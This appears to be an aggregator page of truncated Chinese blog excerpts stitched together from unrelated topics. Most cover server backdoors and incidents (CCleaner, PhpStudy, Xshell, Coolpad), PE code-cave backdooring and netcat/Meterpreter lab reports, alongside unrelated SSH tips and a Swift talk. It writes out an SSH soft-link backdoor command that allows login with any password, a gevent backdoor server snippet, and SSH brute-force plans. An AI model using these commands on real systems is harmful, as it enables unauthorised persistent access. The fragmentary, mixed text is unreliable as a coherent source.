昨天发现服务器上面很多程序被挂马了,跟开发一起处理了挂马文件,今早发现游戏后台又打不开了,上服务器发现后台程序的入口文件都被删了,恢复了index.php.admin.php后才能正常访问,晚上谁也没上过服务器,可以判定服务器已经被入侵了,开始排查: 1.首先查看安全日志,指定命令如下: 1 more /var/log/secure |grep Accepted 通过对命令输出的查看,下面几条记录令人怀疑: 1 2 3 Jul 28 05:32:17 localhost sshd[21684]:…
概述 2017年9月18日,有情报披露,著名的系统优化工具CCleaner的某个版本被发现植入后门,大量使用该工具的用户恐将面临泄密风险.这是继Xshell后门事件后,又一起严重的软件供应链来源攻击事件. CCleaner是一款免费的系统优化和隐私保护工具.主要用来清除Windows系统不再使用的垃圾文件,以腾出更多硬盘空间,并且还具有清除上网记录等功能.被植入后门的版本为8月15日上线的5.33版本. 目前我们发现部分国内下载站点仍在分发存在后门的版本.金睛安全研究团队在此提醒广大使用该工具的…
写在前面的话 这篇文章将介绍使用codecaves对PE文件植入后门代码.有几个很好的工具可以帮到你了.比如BackdoorFactory和Shelter将完成相同的工作,甚至绕过一些静态分析几个防病毒. 开始 让我们理解一些术语: PE文件: 可移植可执行文件(PE)格式是可执行文件,目标代码和DLL的文件格式,用于32位和64位版本的Windows操作系统. Code Cave: 根据维基百科介绍 : “Code Cave是进程内存中的一系列空字节.进程内存中的Code Cave通常是对代码…
北京时间9月20日,杭州公安发布<杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果>一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”.截至案发,近百万PHP用户中超过67万用户已被黑客控制,并大肆盗取账号密码.聊天记录.设备码类等敏感数据多达10万多组,非法牟利600多万元. 面对如此性质恶劣的网络攻击事件,360安全大脑已独家完成了针对“PhpStudy后门”的修复支持,能够有效清除和修复该植入“后门”,第一时间守护用户的个人数据及…
之前说过为了防止SSH的后面漏洞 , 升级到高版本的OpenSSH , 那也不能保证万无一失 经典后门  直接对sshd建立软连接 , 之后用任意密码登录即可 看下面操作 创建完软连接后  创建新的会话 端口自定义 用户root 密码任意输入 登录成功 换个普通用户 登录成功…
后门程序 from gevent.backdoor import BackdoorServer server = BackdoorServer((), banner="Hello from gevent backdoor!", locals={'foo': "From defined scope!"}) server.serve_forever() 使用telnet链接后门,可以使用里面的python编译器查看程序运行情况 $ telnet Trying 127.0…
mac下使用secureCRT发现连接不了虚拟机上的linux 运行 ps -e | grep ssh,查看是否有sshd进程 如果没有,说明server没启动,通过 /etc/init.d/sshd start 启动server进程 启动出错, 看表示是我的ssh配置文件有误, 更正错误的配置文件. 重新启动server. 终于正常了.…
方法1         每次开始的时候输入 bash 虽然只能保存一次,但是简便. 方法2 用       vi ~/.bash_profile   编辑这个文件,  有时会提示这个文件不存在,直接选edit. 在文件加上     export PS1='[\u@\h \W]\$' 在ssh中vi的保存先按ESC,然后:wq! 保存退出. 最后执行     source ~/.bash_profile 这时shell就可以显示路径了 但是好像不能永久保存,只能保存一次 版权声明:本文为博主原…
1.安装ssh 直接 sudo apt-get install openssh-server 2.查看ssh运行状态 ps -e | grep ssh 如果发现 sshd 和 ssh-agent 即表明 ssh服务基本运行正常 3.生成公钥和私钥 ssh-keygen -t rsa -P "" 4.将公钥追加到文件 cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys 5.测试ssh localhost 如果不用输入密码即可以登录…
注:本文出自博主 Chloneda:个人博客 | 博客园 | Github | Gitee | 知乎 本文源链接:https://www.cnblogs.com/chloneda/p/ssh-connect.html 问题场景 终端连接远程 SSH 服务,经常会出现长时间无操作后就自动断开,或者无响应,无法再通过键盘输入,只能强行断开重连. 那么有没有办法保持 SSH 连接不断开,或者断开连接后自动重连呢?有的! 解决方法 方案一:客户端发送心跳 Linux / Unix 下,编辑 ssh 配置…
SSH连接的时候Host key verification failed. ➜ ~ ssh root@192.168.1.88 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBL…
在 VMWare 上安装了 Ubuntu Server 14.04.1(这个默认没有安装 vim ) 我在配置网卡的时候,编辑得很心碎.键盘输入和平常vi的响应完全不一样.又不能用 SecureCRT 这些远程 工具上去编辑. 最后想起 nano (发音:'nænoʊ)这个命令,此命令是在<鸟哥的linux私房菜基础篇>看到的.感谢鸟哥. nano 需要 结合 ctrl 键 进行操作,比如在nano 编辑控制台下面的提示 ^X  就是按键 ctrl+x 如下图: OKey,编辑完成后.ctrl…
本文出自Uber移动架构和框架组负责人托马斯·阿特曼于2016年在湾区Swift峰会上的演讲,分享了使用Swfit重写Uber的好与坏.以下为译文: 我是托马斯·阿特曼,目前是Uber移动架构和框架组负责人.Uber现在的用户量已经达到数百万,这么大的用户量,Uber是如何用框架实现的呢? Swift与百位工程师的故事 — 原因.架构.经验 今天我想谈谈一百多名Uber工程师是如何使用Swift编程语言的,在上周三新发布的Rider App主应用程序全部都是用Swift语言重构的.接下来我的分享…
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任…
文章转自:http://drops.wooyun.org/tips/4342 注:译文未获得平底锅授权,纯属学习性质翻译 原文:https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-cool-reaper.pdf 综述 宇龙酷派是中国第三大以及全球第六大智能手机生产厂商.近期我们研究发现很多高端酷派手机在预装软件均包括一个后门程序,我们将此…
 从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原.但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉.本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门. 1.放大镜后门 放大镜(magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的.在用户登录系统前可以通过"Win+U"组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制…
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其他软件)生成获取目标…
原文地址:http://blog.nsfocus.net/nssock2-dll-module-malicious-code-analysis-report/ NetSarang是一家提供安全连接解决方案的公司,该公司的产品主要包括Xmanager, Xmanager 3D, Xshell, Xftp 和Xlpd.最近,官方在2017年7月18日发布的软件被发现有恶意后门代码,该恶意的后门代码存在于有合法签名的nssock2.dll模块中.从后门代码的分析来看,该代码是由于攻击者入侵的开发者的主…
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四:使用MS…
2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,…
<网络对抗技术>Exp2 PC平台逆向破解之"MAL_简单后门" Week4 一.实验内容 本次实验对象为名为pwn1的pwn1的linux可执行文件.程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell.正常情况下这个代码是不会被运行的.我们实践的目标就是想办法运行这个代码片段.我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode. 实验分…
一.后门的概念       后门是指那些绕过安全性控制而获取对系统访问权的程序 二.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 非官方网站下载应用程序时,该应用程序可能绑定了一些可执行文件,因此留下后门.或者当我们打开一个网页时,如果该网页会自动链接到木马程序的话,就会在后台自动下载安装木马的安装程序, 并会自动安装木马,生成可执行文件,以此在系统留下后门. (2)例举你知道的后门如何启动起来(win及linux)的方式? Windows:设置为开机自启动.修改注册表项…
Exp2 后门原理与实践 1.实验内容  (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接S…
一.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式 答:在莫名其妙的网站下载某些莫名奇妙的播放器. 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:对于windows是双击后门软件执行.对于linux,通过cron指令. 3.Meterpreter有哪些给你映像深刻的功能? 答:截屏功能,录音功能,调用摄像头的功能. 4.如何发现自己有系统有没有被安装后门? 答:使用某管家查杀一下就好. 二.使用netcat获取主机操作Shell,cron启动 1.wind…
后门的基本概念及实验内容 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击…
Exp2 后门原理与实践 目录 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? (2)例举你知道的后门如何启动起来(win及linux)的方式? (3)Meterpreter有哪些给你映像深刻的功能? (4)如何发现自己有系统有没有被安装后门? 实验总结与体会 实践过程记录 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到…
2017-2018-2 『网络对抗技术』Exp2:后门原理与实践 --------CONTENTS-------- 1. 后门原理与实践实验说明 2. 常用后门工具 NC或netcat Win获得Linux Shell Linux获得Win Shell 3. Meterpreter 4. 实验中遇到的问题及思考 Metasploit如何生成各种类型的后门? 5. 实验总结及体会 附:参考资料 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,c…
2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she…
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或netcat获取远程主机的Shell 1.1 Windows获得Linux Shell 1.2 Linux获得Win Shell 1.3 Mac获取Win shell 1.4 Win获取Mac Shell 1.5 Mac获取Linux Shell 1.6 Linux获取Mac Shell 1.7 Netcat扩展知…
2.思路 (1)对root账号进行暴力破解 (2)使用中国姓名top1000作为用户名进行暴力破解 (3)使用top 10000 password字典进行密码破解 (4)利用掌握信息进行社工信息整理并生成字典暴力破解 (5)信息的综合利用以及循环利用 ssh后门 1. 软连接后门 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su-oPort=33223; 经典后门使用ssh root@x.x.x.x -p 33223直接对sshd建立软连接,之后用任意密码登录即可.…